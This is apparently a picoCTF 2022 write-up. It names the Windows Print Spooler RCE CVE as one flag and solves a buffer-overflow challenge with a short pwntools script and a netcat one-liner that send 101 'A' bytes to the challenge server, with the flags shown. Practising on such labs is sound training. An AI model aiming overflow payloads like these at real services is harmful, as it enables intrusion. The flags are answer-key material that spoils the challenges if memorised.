Pico CTF 2022: Binary Exploitation βοΈ π
CVE-XXXX-XXXXX
Enter the CVE of the vulnerability as the flag with the correct flag format: picoCTF{CVE-XXXX-XXXXX} replacing XXXX-XXXXX with the numbers for the matching vulnerability. The CVE weβre looking for is the first recorded remote code execution (RCE) vulnerability in 2021 in the Windows Print Spooler Service, which is available across desktop and server versions of Windows operating systems. The service is used to manage printers and print servers.
With simple googling. https://nsfocusglobal.com/windows-print-spooler-rce-vulnerabilities-cve-2021-1675-cve-2021-34527-mitigation-guide/
Flag : picoCTF{CVE-2021-34527}
buffer overflow 0
Smash the stack Letβs start off simple, can you overflow the correct buffer? The program is available here. You can view source here. And connect with it using:
You can programmatically write a python script to overflow the buffer of the remote program as below.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/usr/bin/python
import pwn
host = "saturn.picoctf.net"
port = 55986
payload = bytes('A'*101, encoding="ascii")
conn = pwn.remote(host,port)
conn.sendlineafter(b' ',payload)
output = conn.recvline(timeout=5)
print(output)
1
2
3
4
β bof0 python bof.py
[+] Opening connection to saturn.picoctf.net on port 55986: Done
b'picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}\n'
[*] Closed connection to saturn.picoctf.net port 55986
Or you can just manually overflow over netcat connection as below.
1
2
3
4
5
β bof0 python -c "print('A'*101)"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
β bof0 nc saturn.picoctf.net 55986
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}
Flag : picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}